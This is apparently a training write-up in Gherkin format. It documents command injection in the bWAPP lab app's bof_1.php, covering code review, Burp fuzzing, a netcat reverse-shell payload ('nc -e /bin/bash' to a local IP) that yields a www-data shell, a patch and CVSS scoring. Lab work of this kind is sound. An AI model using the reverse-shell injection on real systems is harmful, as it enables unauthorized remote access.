## Version 1.4.1
## language: en

Feature:
  TOE:
    bWAPP
  Category:
    Other Bugs
  Location:
    bwapp/bof_1.php
  CWE:
    CWE-78: Improper Neutralization of Special Elements used in an OS Command
  Goal:
    Get a shell on th server
  Recommendation:
    Sanitize your inputs

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
    | beebox                | 1.6       |
  TOE information:
    Given I am running bWAPP on a beebox VM via VirtualBox on http://bwapp

  Scenario: Normal use case
    Given I go to bwapp/bof_1.php
    And I get a page that says
    """
    Search for a movie:
    HINT: \x90*354 + \x8f\x92\x04\x08 + [payload]

    Thanks to David Bloom (@philophobia78) for developing the C++ BOF
    application!
    """
    And a field for searching for movies
    Then I can search for movies in the database

  Scenario: Static detection
  Host header directly sent to user
    Given I check the code at bwapp/bof_1.php
    And I see
    """
    128 $title = $_POST["title"];
    ...
    141 echo shell_exec("./apps/movie_search " . $title);
    """
    Then I notice it's using raw user input in an OS command
    Then I know itś vulnerable to command injection

  Scenario: Dynamic detection
  Fuzzing for command injection
    Given I intercept a POST request to the target URL with Burp
    And I see the request
    """
    POST /bWAPP/bof_1.php HTTP/1.1
    Host: bwapp
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101
    Firefox/65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,
    image/webp,*/*;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://bwapp/bWAPP/bof_1.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 23
    Connection: close
    Cookie: security_level=0; PHPSESSID=6053469979cfb9726d78b20063c9bddc
    Upgrade-Insecure-Requests: 1

    title=hulk&action=search
    """
    Then I send it to the Burp intruder
    And fuzz the title field wit a command injection payload list
    And get some responses echoing the payload gibberish instead of the usual
    Then I know the field is vulnerable to command injection

  Scenario: Exploitation
  Getting a shell
    Given I know the machine is vulnerable to command injection
    Then I open a netcat listener in my machine
    Then go to the target URL and submit "$(nc -e /bin/bash 192.168.56.1 4444)"
    Then I get a shell in the server
    """
    ➜  78-command-injection git:(sgomezatfluid) ✗ nc -lvp 4444
    listening on [any] 4444 ...
    connect to [192.168.56.1] from bwapp [192.168.56.101] 49644
    whoami
    www-data
    """

  Scenario: Remediation
  Sanitize user input to avoid injection
    Given I have patched the code like this
    """
    128 $title = $_POST["title"];
    ...
    141 echo shell_exec(escapeshellcmd("./apps/movie_search " . $title));
    """
    And I try to inject "$(nc -e /bin/bash 192.168.56.1 4444)"
    Then I get the normal response
    """
    No movies were found!
    """
    Then the vulnerability is patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.9/10 (Critical) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.5/10 (Critical) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    9.5/10 (Critical) - CR:M/IR:M/AR:M

  Scenario: Correlations
    systems/bwapp/937-components-known-vulns
      Given I can get a shell on the server as www-data
      Then I can exploit the privesc vulnerability
      And get root access